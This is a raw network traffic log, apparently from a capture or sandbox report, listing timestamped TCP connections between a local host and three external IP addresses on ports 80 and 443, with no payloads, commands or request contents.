Nov 21, 2024 10:36:52.471645117 CET	49737	443	192.168.2.4	172.217.16.129
Nov 21, 2024 10:36:52.472527027 CET	443	49737	172.217.16.129	192.168.2.4
Nov 21, 2024 10:36:52.472573996 CET	49737	443	192.168.2.4	172.217.16.129
Nov 21, 2024 10:36:52.474771023 CET	443	49737	172.217.16.129	192.168.2.4
Nov 21, 2024 10:36:52.474816084 CET	49737	443	192.168.2.4	172.217.16.129
Nov 21, 2024 10:36:52.475507975 CET	443	49737	172.217.16.129	192.168.2.4
Nov 21, 2024 10:36:52.475553036 CET	49737	443	192.168.2.4	172.217.16.129
Nov 21, 2024 10:36:52.478333950 CET	443	49737	172.217.16.129	192.168.2.4
Nov 21, 2024 10:36:52.478379965 CET	49737	443	192.168.2.4	172.217.16.129
Nov 21, 2024 10:36:52.481224060 CET	443	49737	172.217.16.129	192.168.2.4
Nov 21, 2024 10:36:52.481275082 CET	49737	443	192.168.2.4	172.217.16.129
Nov 21, 2024 10:36:52.481504917 CET	443	49737	172.217.16.129	192.168.2.4
Nov 21, 2024 10:36:52.481551886 CET	49737	443	192.168.2.4	172.217.16.129
Nov 21, 2024 10:36:52.484462976 CET	443	49737	172.217.16.129	192.168.2.4
Nov 21, 2024 10:36:52.484508038 CET	49737	443	192.168.2.4	172.217.16.129
Nov 21, 2024 10:36:52.485023022 CET	443	49737	172.217.16.129	192.168.2.4
Nov 21, 2024 10:36:52.485064030 CET	49737	443	192.168.2.4	172.217.16.129
Nov 21, 2024 10:36:52.487610102 CET	443	49737	172.217.16.129	192.168.2.4
Nov 21, 2024 10:36:52.487656116 CET	49737	443	192.168.2.4	172.217.16.129
Nov 21, 2024 10:36:52.490830898 CET	443	49737	172.217.16.129	192.168.2.4
Nov 21, 2024 10:36:52.490900993 CET	49737	443	192.168.2.4	172.217.16.129
Nov 21, 2024 10:36:52.491111994 CET	443	49737	172.217.16.129	192.168.2.4
Nov 21, 2024 10:36:52.491153002 CET	49737	443	192.168.2.4	172.217.16.129
Nov 21, 2024 10:36:52.494162083 CET	443	49737	172.217.16.129	192.168.2.4
Nov 21, 2024 10:36:52.494210958 CET	49737	443	192.168.2.4	172.217.16.129
Nov 21, 2024 10:36:52.494308949 CET	443	49737	172.217.16.129	192.168.2.4
Nov 21, 2024 10:36:52.494354963 CET	49737	443	192.168.2.4	172.217.16.129
Nov 21, 2024 10:36:52.497298002 CET	443	49737	172.217.16.129	192.168.2.4
Nov 21, 2024 10:36:52.497349977 CET	49737	443	192.168.2.4	172.217.16.129
Nov 21, 2024 10:36:52.497858047 CET	443	49737	172.217.16.129	192.168.2.4
Nov 21, 2024 10:36:52.497905016 CET	49737	443	192.168.2.4	172.217.16.129
Nov 21, 2024 10:36:52.500494003 CET	443	49737	172.217.16.129	192.168.2.4
Nov 21, 2024 10:36:52.500541925 CET	49737	443	192.168.2.4	172.217.16.129
Nov 21, 2024 10:36:52.500662088 CET	443	49737	172.217.16.129	192.168.2.4
Nov 21, 2024 10:36:52.500705004 CET	49737	443	192.168.2.4	172.217.16.129
Nov 21, 2024 10:36:52.503704071 CET	443	49737	172.217.16.129	192.168.2.4
Nov 21, 2024 10:36:52.503751993 CET	49737	443	192.168.2.4	172.217.16.129
Nov 21, 2024 10:36:52.504127979 CET	443	49737	172.217.16.129	192.168.2.4
Nov 21, 2024 10:36:52.504174948 CET	49737	443	192.168.2.4	172.217.16.129
Nov 21, 2024 10:36:52.507615089 CET	443	49737	172.217.16.129	192.168.2.4
Nov 21, 2024 10:36:52.507666111 CET	49737	443	192.168.2.4	172.217.16.129
Nov 21, 2024 10:36:52.510494947 CET	443	49737	172.217.16.129	192.168.2.4
Nov 21, 2024 10:36:52.510543108 CET	49737	443	192.168.2.4	172.217.16.129
Nov 21, 2024 10:36:52.511032104 CET	443	49737	172.217.16.129	192.168.2.4
Nov 21, 2024 10:36:52.511091948 CET	49737	443	192.168.2.4	172.217.16.129
Nov 21, 2024 10:36:52.513422966 CET	443	49737	172.217.16.129	192.168.2.4
Nov 21, 2024 10:36:52.513470888 CET	49737	443	192.168.2.4	172.217.16.129
Nov 21, 2024 10:36:52.513506889 CET	443	49737	172.217.16.129	192.168.2.4
Nov 21, 2024 10:36:52.513556004 CET	49737	443	192.168.2.4	172.217.16.129
Nov 21, 2024 10:36:52.516590118 CET	443	49737	172.217.16.129	192.168.2.4
Nov 21, 2024 10:36:52.516638041 CET	49737	443	192.168.2.4	172.217.16.129
Nov 21, 2024 10:36:52.519771099 CET	443	49737	172.217.16.129	192.168.2.4
Nov 21, 2024 10:36:52.519824982 CET	49737	443	192.168.2.4	172.217.16.129
Nov 21, 2024 10:36:52.519972086 CET	443	49737	172.217.16.129	192.168.2.4
Nov 21, 2024 10:36:52.520015001 CET	49737	443	192.168.2.4	172.217.16.129
Nov 21, 2024 10:36:52.522979975 CET	443	49737	172.217.16.129	192.168.2.4
Nov 21, 2024 10:36:52.523031950 CET	49737	443	192.168.2.4	172.217.16.129
Nov 21, 2024 10:36:52.523442030 CET	443	49737	172.217.16.129	192.168.2.4
Nov 21, 2024 10:36:52.523595095 CET	49737	443	192.168.2.4	172.217.16.129
Nov 21, 2024 10:36:52.526560068 CET	443	49737	172.217.16.129	192.168.2.4
Nov 21, 2024 10:36:52.526627064 CET	49737	443	192.168.2.4	172.217.16.129
Nov 21, 2024 10:36:52.526690960 CET	443	49737	172.217.16.129	192.168.2.4
Nov 21, 2024 10:36:52.526736021 CET	49737	443	192.168.2.4	172.217.16.129
Nov 21, 2024 10:36:52.529347897 CET	443	49737	172.217.16.129	192.168.2.4
Nov 21, 2024 10:36:52.529400110 CET	49737	443	192.168.2.4	172.217.16.129
Nov 21, 2024 10:36:52.532592058 CET	443	49737	172.217.16.129	192.168.2.4
Nov 21, 2024 10:36:52.532639980 CET	49737	443	192.168.2.4	172.217.16.129
Nov 21, 2024 10:36:52.532740116 CET	443	49737	172.217.16.129	192.168.2.4
Nov 21, 2024 10:36:52.532787085 CET	49737	443	192.168.2.4	172.217.16.129
Nov 21, 2024 10:36:52.535448074 CET	443	49737	172.217.16.129	192.168.2.4
Nov 21, 2024 10:36:52.535496950 CET	49737	443	192.168.2.4	172.217.16.129
Nov 21, 2024 10:36:52.535865068 CET	443	49737	172.217.16.129	192.168.2.4
Nov 21, 2024 10:36:52.535912037 CET	49737	443	192.168.2.4	172.217.16.129
Nov 21, 2024 10:36:52.538500071 CET	443	49737	172.217.16.129	192.168.2.4
Nov 21, 2024 10:36:52.538556099 CET	49737	443	192.168.2.4	172.217.16.129
Nov 21, 2024 10:36:52.538750887 CET	443	49737	172.217.16.129	192.168.2.4
Nov 21, 2024 10:36:52.538799047 CET	49737	443	192.168.2.4	172.217.16.129
Nov 21, 2024 10:36:52.541516066 CET	443	49737	172.217.16.129	192.168.2.4
Nov 21, 2024 10:36:52.541563034 CET	49737	443	192.168.2.4	172.217.16.129
Nov 21, 2024 10:36:52.544409990 CET	443	49737	172.217.16.129	192.168.2.4
Nov 21, 2024 10:36:52.544454098 CET	49737	443	192.168.2.4	172.217.16.129
Nov 21, 2024 10:36:52.544466019 CET	443	49737	172.217.16.129	192.168.2.4
Nov 21, 2024 10:36:52.544506073 CET	49737	443	192.168.2.4	172.217.16.129
Nov 21, 2024 10:36:52.595613003 CET	443	49737	172.217.16.129	192.168.2.4
Nov 21, 2024 10:36:52.595690966 CET	49737	443	192.168.2.4	172.217.16.129
Nov 21, 2024 10:36:52.596657991 CET	443	49737	172.217.16.129	192.168.2.4
Nov 21, 2024 10:36:52.596705914 CET	49737	443	192.168.2.4	172.217.16.129
Nov 21, 2024 10:36:52.596716881 CET	443	49737	172.217.16.129	192.168.2.4
Nov 21, 2024 10:36:52.596762896 CET	49737	443	192.168.2.4	172.217.16.129
Nov 21, 2024 10:36:52.599544048 CET	443	49737	172.217.16.129	192.168.2.4
Nov 21, 2024 10:36:52.599598885 CET	49737	443	192.168.2.4	172.217.16.129
Nov 21, 2024 10:36:52.599603891 CET	443	49737	172.217.16.129	192.168.2.4
Nov 21, 2024 10:36:52.599653959 CET	49737	443	192.168.2.4	172.217.16.129
Nov 21, 2024 10:36:52.602278948 CET	443	49737	172.217.16.129	192.168.2.4
Nov 21, 2024 10:36:52.602329969 CET	49737	443	192.168.2.4	172.217.16.129
Nov 21, 2024 10:36:52.602406025 CET	443	49737	172.217.16.129	192.168.2.4
Nov 21, 2024 10:36:52.602458954 CET	49737	443	192.168.2.4	172.217.16.129
Nov 21, 2024 10:36:52.606323004 CET	443	49737	172.217.16.129	192.168.2.4
Nov 21, 2024 10:36:52.606364965 CET	49737	443	192.168.2.4	172.217.16.129
Nov 21, 2024 10:36:52.608167887 CET	443	49737	172.217.16.129	192.168.2.4
Nov 21, 2024 10:36:52.608227968 CET	49737	443	192.168.2.4	172.217.16.129
Nov 21, 2024 10:36:52.608275890 CET	443	49737	172.217.16.129	192.168.2.4
Nov 21, 2024 10:36:52.608325005 CET	49737	443	192.168.2.4	172.217.16.129
Nov 21, 2024 10:36:52.625865936 CET	443	49737	172.217.16.129	192.168.2.4
Nov 21, 2024 10:36:52.625941038 CET	49737	443	192.168.2.4	172.217.16.129
Nov 21, 2024 10:36:52.626115084 CET	443	49737	172.217.16.129	192.168.2.4
Nov 21, 2024 10:36:52.626158953 CET	49737	443	192.168.2.4	172.217.16.129
Nov 21, 2024 10:36:52.626815081 CET	443	49737	172.217.16.129	192.168.2.4
Nov 21, 2024 10:36:52.626857996 CET	49737	443	192.168.2.4	172.217.16.129
Nov 21, 2024 10:36:52.627420902 CET	443	49737	172.217.16.129	192.168.2.4
Nov 21, 2024 10:36:52.627463102 CET	49737	443	192.168.2.4	172.217.16.129
Nov 21, 2024 10:36:52.629870892 CET	443	49737	172.217.16.129	192.168.2.4
Nov 21, 2024 10:36:52.633224964 CET	443	49737	172.217.16.129	192.168.2.4
Nov 21, 2024 10:36:52.633307934 CET	49737	443	192.168.2.4	172.217.16.129
Nov 21, 2024 10:36:52.633322954 CET	443	49737	172.217.16.129	192.168.2.4
Nov 21, 2024 10:36:52.633368015 CET	49737	443	192.168.2.4	172.217.16.129
Nov 21, 2024 10:36:52.634561062 CET	443	49737	172.217.16.129	192.168.2.4
Nov 21, 2024 10:36:52.634620905 CET	49737	443	192.168.2.4	172.217.16.129
Nov 21, 2024 10:36:52.634802103 CET	443	49737	172.217.16.129	192.168.2.4
Nov 21, 2024 10:36:52.634844065 CET	49737	443	192.168.2.4	172.217.16.129
Nov 21, 2024 10:36:52.636745930 CET	443	49737	172.217.16.129	192.168.2.4
Nov 21, 2024 10:36:52.636801958 CET	49737	443	192.168.2.4	172.217.16.129
Nov 21, 2024 10:36:52.638832092 CET	443	49737	172.217.16.129	192.168.2.4
Nov 21, 2024 10:36:52.640769005 CET	443	49737	172.217.16.129	192.168.2.4
Nov 21, 2024 10:36:52.640825033 CET	443	49737	172.217.16.129	192.168.2.4
Nov 21, 2024 10:36:52.640845060 CET	49737	443	192.168.2.4	172.217.16.129
Nov 21, 2024 10:36:52.640851974 CET	443	49737	172.217.16.129	192.168.2.4
Nov 21, 2024 10:36:52.640897989 CET	49737	443	192.168.2.4	172.217.16.129
Nov 21, 2024 10:36:52.641977072 CET	443	49737	172.217.16.129	192.168.2.4
Nov 21, 2024 10:36:52.643240929 CET	443	49737	172.217.16.129	192.168.2.4
Nov 21, 2024 10:36:52.643306971 CET	49737	443	192.168.2.4	172.217.16.129
Nov 21, 2024 10:36:52.643320084 CET	443	49737	172.217.16.129	192.168.2.4
Nov 21, 2024 10:36:52.643358946 CET	49737	443	192.168.2.4	172.217.16.129
Nov 21, 2024 10:36:52.643685102 CET	443	49737	172.217.16.129	192.168.2.4
Nov 21, 2024 10:36:52.643727064 CET	49737	443	192.168.2.4	172.217.16.129
Nov 21, 2024 10:36:52.644474983 CET	443	49737	172.217.16.129	192.168.2.4
Nov 21, 2024 10:36:52.644526005 CET	49737	443	192.168.2.4	172.217.16.129
Nov 21, 2024 10:36:52.644764900 CET	443	49737	172.217.16.129	192.168.2.4
Nov 21, 2024 10:36:52.644814014 CET	49737	443	192.168.2.4	172.217.16.129
Nov 21, 2024 10:36:52.645752907 CET	443	49737	172.217.16.129	192.168.2.4
Nov 21, 2024 10:36:52.645848036 CET	49737	443	192.168.2.4	172.217.16.129
Nov 21, 2024 10:36:52.646907091 CET	443	49737	172.217.16.129	192.168.2.4
Nov 21, 2024 10:36:52.648102045 CET	443	49737	172.217.16.129	192.168.2.4
Nov 21, 2024 10:36:52.648150921 CET	49737	443	192.168.2.4	172.217.16.129
Nov 21, 2024 10:36:52.648156881 CET	443	49737	172.217.16.129	192.168.2.4
Nov 21, 2024 10:36:52.648195982 CET	49737	443	192.168.2.4	172.217.16.129
Nov 21, 2024 10:36:52.648329020 CET	443	49737	172.217.16.129	192.168.2.4
Nov 21, 2024 10:36:52.648367882 CET	49737	443	192.168.2.4	172.217.16.129
Nov 21, 2024 10:36:52.649332047 CET	443	49737	172.217.16.129	192.168.2.4
Nov 21, 2024 10:36:52.650998116 CET	443	49737	172.217.16.129	192.168.2.4
Nov 21, 2024 10:36:52.651051998 CET	49737	443	192.168.2.4	172.217.16.129
Nov 21, 2024 10:36:52.651058912 CET	443	49737	172.217.16.129	192.168.2.4
Nov 21, 2024 10:36:52.651097059 CET	49737	443	192.168.2.4	172.217.16.129
Nov 21, 2024 10:36:52.651864052 CET	443	49737	172.217.16.129	192.168.2.4
Nov 21, 2024 10:36:52.651918888 CET	49737	443	192.168.2.4	172.217.16.129
Nov 21, 2024 10:36:52.651946068 CET	443	49737	172.217.16.129	192.168.2.4
Nov 21, 2024 10:36:52.651993036 CET	49737	443	192.168.2.4	172.217.16.129
Nov 21, 2024 10:36:52.651997089 CET	443	49737	172.217.16.129	192.168.2.4
Nov 21, 2024 10:36:52.652019024 CET	49737	443	192.168.2.4	172.217.16.129
Nov 21, 2024 10:36:52.652028084 CET	443	49737	172.217.16.129	192.168.2.4
Nov 21, 2024 10:36:52.652038097 CET	49737	443	192.168.2.4	172.217.16.129
Nov 21, 2024 10:36:52.652046919 CET	49737	443	192.168.2.4	172.217.16.129
Nov 21, 2024 10:36:52.652065992 CET	49737	443	192.168.2.4	172.217.16.129
Nov 21, 2024 10:36:54.723022938 CET	49738	80	192.168.2.4	132.226.247.73
Nov 21, 2024 10:36:54.844192028 CET	80	49738	132.226.247.73	192.168.2.4
Nov 21, 2024 10:36:54.847460985 CET	49738	80	192.168.2.4	132.226.247.73
Nov 21, 2024 10:36:54.847724915 CET	49738	80	192.168.2.4	132.226.247.73
Nov 21, 2024 10:36:54.969294071 CET	80	49738	132.226.247.73	192.168.2.4
Nov 21, 2024 10:36:56.266486883 CET	80	49738	132.226.247.73	192.168.2.4
Nov 21, 2024 10:36:56.270468950 CET	49738	80	192.168.2.4	132.226.247.73
Nov 21, 2024 10:36:56.391473055 CET	80	49738	132.226.247.73	192.168.2.4
Nov 21, 2024 10:36:56.732161045 CET	80	49738	132.226.247.73	192.168.2.4
Nov 21, 2024 10:36:56.775749922 CET	49738	80	192.168.2.4	132.226.247.73
Nov 21, 2024 10:36:57.236637115 CET	49739	443	192.168.2.4	188.114.96.3
Nov 21, 2024 10:36:57.236680984 CET	443	49739	188.114.96.3	192.168.2.4
Nov 21, 2024 10:36:57.236767054 CET	49739	443	192.168.2.4	188.114.96.3
Nov 21, 2024 10:36:57.238934994 CET	49739	443	192.168.2.4	188.114.96.3
Nov 21, 2024 10:36:57.238951921 CET	443	49739	188.114.96.3	192.168.2.4
Nov 21, 2024 10:36:58.502367020 CET	443	49739	188.114.96.3	192.168.2.4
Nov 21, 2024 10:36:58.502542973 CET	49739	443	192.168.2.4	188.114.96.3
Nov 21, 2024 10:36:58.506443024 CET	49739	443	192.168.2.4	188.114.96.3
Nov 21, 2024 10:36:58.506467104 CET	443	49739	188.114.96.3	192.168.2.4
Nov 21, 2024 10:36:58.506778955 CET	443	49739	188.114.96.3	192.168.2.4
Nov 21, 2024 10:36:58.513137102 CET	49739	443	192.168.2.4	188.114.96.3
Nov 21, 2024 10:36:58.555339098 CET	443	49739	188.114.96.3	192.168.2.4
Nov 21, 2024 10:36:58.957515001 CET	443	49739	188.114.96.3	192.168.2.4
Nov 21, 2024 10:36:58.957578897 CET	443	49739	188.114.96.3	192.168.2.4
Nov 21, 2024 10:36:58.957676888 CET	49739	443	192.168.2.4	188.114.96.3
Nov 21, 2024 10:36:59.006433010 CET	49739	443	192.168.2.4	188.114.96.3
Nov 21, 2024 10:36:59.013725042 CET	49738	80	192.168.2.4	132.226.247.73
Nov 21, 2024 10:36:59.133352995 CET	80	49738	132.226.247.73	192.168.2.4
Nov 21, 2024 10:36:59.455626011 CET	80	49738	132.226.247.73	192.168.2.4
Nov 21, 2024 10:36:59.458566904 CET	49740	443	192.168.2.4	188.114.96.3
Nov 21, 2024 10:36:59.458626032 CET	443	49740	188.114.96.3	192.168.2.4
Nov 21, 2024 10:36:59.458726883 CET	49740	443	192.168.2.4	188.114.96.3
Nov 21, 2024 10:36:59.459029913 CET	49740	443	192.168.2.4	188.114.96.3
Nov 21, 2024 10:36:59.459048033 CET	443	49740	188.114.96.3	192.168.2.4
Nov 21, 2024 10:36:59.510232925 CET	49738	80	192.168.2.4	132.226.247.73
Nov 21, 2024 10:37:00.715768099 CET	443	49740	188.114.96.3	192.168.2.4
Nov 21, 2024 10:37:00.726270914 CET	49740	443	192.168.2.4	188.114.96.3
Nov 21, 2024 10:37:00.726306915 CET	443	49740	188.114.96.3	192.168.2.4
Nov 21, 2024 10:37:01.172354937 CET	443	49740	188.114.96.3	192.168.2.4
Nov 21, 2024 10:37:01.172421932 CET	443	49740	188.114.96.3	192.168.2.4
Nov 21, 2024 10:37:01.172529936 CET	49740	443	192.168.2.4	188.114.96.3
Nov 21, 2024 10:37:01.173043966 CET	49740	443	192.168.2.4	188.114.96.3
Nov 21, 2024 10:37:01.176875114 CET	49738	80	192.168.2.4	132.226.247.73
Nov 21, 2024 10:37:01.178201914 CET	49742	80	192.168.2.4	132.226.247.73
Nov 21, 2024 10:37:01.296650887 CET	80	49738	132.226.247.73	192.168.2.4
Nov 21, 2024 10:37:01.296735048 CET	49738	80	192.168.2.4	132.226.247.73
Nov 21, 2024 10:37:01.297703028 CET	80	49742	132.226.247.73	192.168.2.4
Nov 21, 2024 10:37:01.297781944 CET	49742	80	192.168.2.4	132.226.247.73
Nov 21, 2024 10:37:01.297985077 CET	49742	80	192.168.2.4	132.226.247.73
Nov 21, 2024 10:37:01.417529106 CET	80	49742	132.226.247.73	192.168.2.4
Nov 21, 2024 10:37:02.602108002 CET	80	49742	132.226.247.73	192.168.2.4
Nov 21, 2024 10:37:02.603385925 CET	49743	443	192.168.2.4	188.114.96.3
Nov 21, 2024 10:37:02.603429079 CET	443	49743	188.114.96.3	192.168.2.4
Nov 21, 2024 10:37:02.603491068 CET	49743	443	192.168.2.4	188.114.96.3
Nov 21, 2024 10:37:02.603820086 CET	49743	443	192.168.2.4	188.114.96.3
Nov 21, 2024 10:37:02.603833914 CET	443	49743	188.114.96.3	192.168.2.4
Nov 21, 2024 10:37:02.650777102 CET	49742	80	192.168.2.4	132.226.247.73
Nov 21, 2024 10:37:03.911047935 CET	443	49743	188.114.96.3	192.168.2.4
Nov 21, 2024 10:37:03.913491011 CET	49743	443	192.168.2.4	188.114.96.3
Nov 21, 2024 10:37:03.913527966 CET	443	49743	188.114.96.3	192.168.2.4
Nov 21, 2024 10:37:04.377857924 CET	443	49743	188.114.96.3	192.168.2.4
Nov 21, 2024 10:37:04.377959967 CET	443	49743	188.114.96.3	192.168.2.4
Nov 21, 2024 10:37:04.378056049 CET	49743	443	192.168.2.4	188.114.96.3
Nov 21, 2024 10:37:04.378426075 CET	49743	443	192.168.2.4	188.114.96.3
Nov 21, 2024 10:37:04.382718086 CET	49750	80	192.168.2.4	132.226.247.73
Nov 21, 2024 10:37:04.502372026 CET	80	49750	132.226.247.73	192.168.2.4
Nov 21, 2024 10:37:04.502485991 CET	49750	80	192.168.2.4	132.226.247.73
Nov 21, 2024 10:37:04.502619982 CET	49750	80	192.168.2.4	132.226.247.73
Nov 21, 2024 10:37:04.622752905 CET	80	49750	132.226.247.73	192.168.2.4
Nov 21, 2024 10:37:05.811295986 CET	80	49750	132.226.247.73	192.168.2.4
Nov 21, 2024 10:37:05.818284035 CET	49756	443	192.168.2.4	188.114.96.3
Nov 21, 2024 10:37:05.818311930 CET	443	49756	188.114.96.3	192.168.2.4
Nov 21, 2024 10:37:05.818376064 CET	49756	443	192.168.2.4	188.114.96.3
Nov 21, 2024 10:37:05.818612099 CET	49756	443	192.168.2.4	188.114.96.3
Nov 21, 2024 10:37:05.818633080 CET	443	49756	188.114.96.3	192.168.2.4
Nov 21, 2024 10:37:05.853895903 CET	49750	80	192.168.2.4	132.226.247.73
Nov 21, 2024 10:37:07.082367897 CET	443	49756	188.114.96.3	192.168.2.4
Nov 21, 2024 10:37:07.083822966 CET	49756	443	192.168.2.4	188.114.96.3
Nov 21, 2024 10:37:07.083847046 CET	443	49756	188.114.96.3	192.168.2.4
Nov 21, 2024 10:37:07.538053989 CET	443	49756	188.114.96.3	192.168.2.4
Nov 21, 2024 10:37:07.538119078 CET	443	49756	188.114.96.3	192.168.2.4
Nov 21, 2024 10:37:07.538196087 CET	49756	443	192.168.2.4	188.114.96.3
Nov 21, 2024 10:37:07.538567066 CET	49756	443	192.168.2.4	188.114.96.3
Nov 21, 2024 10:37:07.542778969 CET	49750	80	192.168.2.4	132.226.247.73
Nov 21, 2024 10:37:07.543420076 CET	49757	80	192.168.2.4	132.226.247.73
Nov 21, 2024 10:37:07.663486004 CET	80	49750	132.226.247.73	192.168.2.4
Nov 21, 2024 10:37:07.663558006 CET	80	49757	132.226.247.73	192.168.2.4
Nov 21, 2024 10:37:07.663559914 CET	49750	80	192.168.2.4	132.226.247.73
Nov 21, 2024 10:37:07.663763046 CET	49757	80	192.168.2.4	132.226.247.73
Nov 21, 2024 10:37:07.663763046 CET	49757	80	192.168.2.4	132.226.247.73
Nov 21, 2024 10:37:07.785105944 CET	80	49757	132.226.247.73	192.168.2.4
Nov 21, 2024 10:37:09.062751055 CET	80	49757	132.226.247.73	192.168.2.4
Nov 21, 2024 10:37:09.064145088 CET	49763	443	192.168.2.4	188.114.96.3
Nov 21, 2024 10:37:09.064235926 CET	443	49763	188.114.96.3	192.168.2.4
Nov 21, 2024 10:37:09.064378977 CET	49763	443	192.168.2.4	188.114.96.3
Nov 21, 2024 10:37:09.064652920 CET	49763	443	192.168.2.4	188.114.96.3
Nov 21, 2024 10:37:09.064688921 CET	443	49763	188.114.96.3	192.168.2.4
Nov 21, 2024 10:37:09.103924990 CET	49757	80	192.168.2.4	132.226.247.73
Nov 21, 2024 10:37:10.322949886 CET	443	49763	188.114.96.3	192.168.2.4
Nov 21, 2024 10:37:10.324482918 CET	49763	443	192.168.2.4	188.114.96.3
Nov 21, 2024 10:37:10.324517965 CET	443	49763	188.114.96.3	192.168.2.4
Nov 21, 2024 10:37:10.777095079 CET	443	49763	188.114.96.3	192.168.2.4
Nov 21, 2024 10:37:10.777178049 CET	443	49763	188.114.96.3	192.168.2.4
Nov 21, 2024 10:37:10.777235985 CET	49763	443	192.168.2.4	188.114.96.3
Nov 21, 2024 10:37:10.778039932 CET	49763	443	192.168.2.4	188.114.96.3
Nov 21, 2024 10:37:10.794323921 CET	49757	80	192.168.2.4	132.226.247.73
Nov 21, 2024 10:37:10.795500994 CET	49769	80	192.168.2.4	132.226.247.73
Nov 21, 2024 10:37:10.914329052 CET	80	49757	132.226.247.73	192.168.2.4
Nov 21, 2024 10:37:10.914412975 CET	49757	80	192.168.2.4	132.226.247.73
Nov 21, 2024 10:37:10.915085077 CET	80	49769	132.226.247.73	192.168.2.4
Nov 21, 2024 10:37:10.915165901 CET	49769	80	192.168.2.4	132.226.247.73
Nov 21, 2024 10:37:10.915276051 CET	49769	80	192.168.2.4	132.226.247.73
Nov 21, 2024 10:37:11.035013914 CET	80	49769	132.226.247.73	192.168.2.4
Nov 21, 2024 10:37:12.284670115 CET	80	49769	132.226.247.73	192.168.2.4
Nov 21, 2024 10:37:12.286322117 CET	49770	443	192.168.2.4	188.114.96.3
Nov 21, 2024 10:37:12.286360979 CET	443	49770	188.114.96.3	192.168.2.4
Nov 21, 2024 10:37:12.286444902 CET	49770	443	192.168.2.4	188.114.96.3
Nov 21, 2024 10:37:12.286685944 CET	49770	443	192.168.2.4	188.114.96.3
Nov 21, 2024 10:37:12.286700010 CET	443	49770	188.114.96.3	192.168.2.4
Nov 21, 2024 10:37:12.338282108 CET	49769	80	192.168.2.4	132.226.247.73
Nov 21, 2024 10:37:13.544193029 CET	443	49770	188.114.96.3	192.168.2.4
Nov 21, 2024 10:37:13.546004057 CET	49770	443	192.168.2.4	188.114.96.3
Nov 21, 2024 10:37:13.546032906 CET	443	49770	188.114.96.3	192.168.2.4
Nov 21, 2024 10:37:13.998331070 CET	443	49770	188.114.96.3	192.168.2.4
Nov 21, 2024 10:37:13.998399973 CET	443	49770	188.114.96.3	192.168.2.4
Nov 21, 2024 10:37:13.998454094 CET	49770	443	192.168.2.4	188.114.96.3
Nov 21, 2024 10:37:13.998949051 CET	49770	443	192.168.2.4	188.114.96.3
Nov 21, 2024 10:37:14.002125025 CET	49769	80	192.168.2.4	132.226.247.73
Nov 21, 2024 10:37:14.003277063 CET	49776	80	192.168.2.4	132.226.247.73
Nov 21, 2024 10:37:14.121982098 CET	80	49769	132.226.247.73	192.168.2.4
Nov 21, 2024 10:37:14.122086048 CET	49769	80	192.168.2.4	132.226.247.73
Nov 21, 2024 10:37:14.122859001 CET	80	49776	132.226.247.73	192.168.2.4
Nov 21, 2024 10:37:14.122930050 CET	49776	80	192.168.2.4	132.226.247.73
Nov 21, 2024 10:37:14.123074055 CET	49776	80	192.168.2.4	132.226.247.73
Nov 21, 2024 10:37:14.242603064 CET	80	49776	132.226.247.73	192.168.2.4
Nov 21, 2024 10:37:15.518369913 CET	80	49776	132.226.247.73	192.168.2.4
Nov 21, 2024 10:37:15.523257971 CET	49782	443	192.168.2.4	188.114.96.3
Nov 21, 2024 10:37:15.523344994 CET	443	49782	188.114.96.3	192.168.2.4
Nov 21, 2024 10:37:15.523428917 CET	49782	443	192.168.2.4	188.114.96.3
Nov 21, 2024 10:37:15.526954889 CET	49782	443	192.168.2.4	188.114.96.3
Nov 21, 2024 10:37:15.526988029 CET	443	49782	188.114.96.3	192.168.2.4
Nov 21, 2024 10:37:15.572681904 CET	49776	80	192.168.2.4	132.226.247.73
Nov 21, 2024 10:37:16.833446026 CET	443	49782	188.114.96.3	192.168.2.4
Nov 21, 2024 10:37:16.836932898 CET	49782	443	192.168.2.4	188.114.96.3
Nov 21, 2024 10:37:16.837011099 CET	443	49782	188.114.96.3	192.168.2.4
Nov 21, 2024 10:37:17.561119080 CET	443	49782	188.114.96.3	192.168.2.4
Nov 21, 2024 10:37:17.561201096 CET	443	49782	188.114.96.3	192.168.2.4
Nov 21, 2024 10:37:17.561513901 CET	49782	443	192.168.2.4	188.114.96.3
Nov 21, 2024 10:37:17.561769009 CET	49782	443	192.168.2.4	188.114.96.3
Nov 21, 2024 10:37:17.565013885 CET	49776	80	192.168.2.4	132.226.247.73
Nov 21, 2024 10:37:17.566107035 CET	49788	80	192.168.2.4	132.226.247.73
Nov 21, 2024 10:37:17.684792995 CET	80	49776	132.226.247.73	192.168.2.4
Nov 21, 2024 10:37:17.685435057 CET	49776	80	192.168.2.4	132.226.247.73
Nov 21, 2024 10:37:17.685503960 CET	80	49788	132.226.247.73	192.168.2.4
Nov 21, 2024 10:37:17.688991070 CET	49788	80	192.168.2.4	132.226.247.73
Nov 21, 2024 10:37:17.689116001 CET	49788	80	192.168.2.4	132.226.247.73
Nov 21, 2024 10:37:17.808583021 CET	80	49788	132.226.247.73	192.168.2.4
Nov 21, 2024 10:37:19.085024118 CET	80	49788	132.226.247.73	192.168.2.4
Nov 21, 2024 10:37:19.086563110 CET	49789	443	192.168.2.4	188.114.96.3
Nov 21, 2024 10:37:19.086604118 CET	443	49789	188.114.96.3	192.168.2.4
Nov 21, 2024 10:37:19.086680889 CET	49789	443	192.168.2.4	188.114.96.3
Nov 21, 2024 10:37:19.086919069 CET	49789	443	192.168.2.4	188.114.96.3
Nov 21, 2024 10:37:19.086944103 CET	443	49789	188.114.96.3	192.168.2.4
Nov 21, 2024 10:37:19.135175943 CET	49788	80	192.168.2.4	132.226.247.73
Nov 21, 2024 10:37:20.350342035 CET	443	49789	188.114.96.3	192.168.2.4
Nov 21, 2024 10:37:20.352237940 CET	49789	443	192.168.2.4	188.114.96.3
Nov 21, 2024 10:37:20.352261066 CET	443	49789	188.114.96.3	192.168.2.4
Nov 21, 2024 10:37:20.804419041 CET	443	49789	188.114.96.3	192.168.2.4
Nov 21, 2024 10:37:20.804497004 CET	443	49789	188.114.96.3	192.168.2.4
Nov 21, 2024 10:37:20.804584026 CET	49789	443	192.168.2.4	188.114.96.3
Nov 21, 2024 10:37:20.804909945 CET	49789	443	192.168.2.4	188.114.96.3
Nov 21, 2024 10:37:20.808134079 CET	49788	80	192.168.2.4	132.226.247.73
Nov 21, 2024 10:37:20.809137106 CET	49795	80	192.168.2.4	132.226.247.73
Nov 21, 2024 10:37:20.927921057 CET	80	49788	132.226.247.73	192.168.2.4
Nov 21, 2024 10:37:20.928069115 CET	49788	80	192.168.2.4	132.226.247.73
Nov 21, 2024 10:37:20.928617954 CET	80	49795	132.226.247.73	192.168.2.4
Nov 21, 2024 10:37:20.928706884 CET	49795	80	192.168.2.4	132.226.247.73
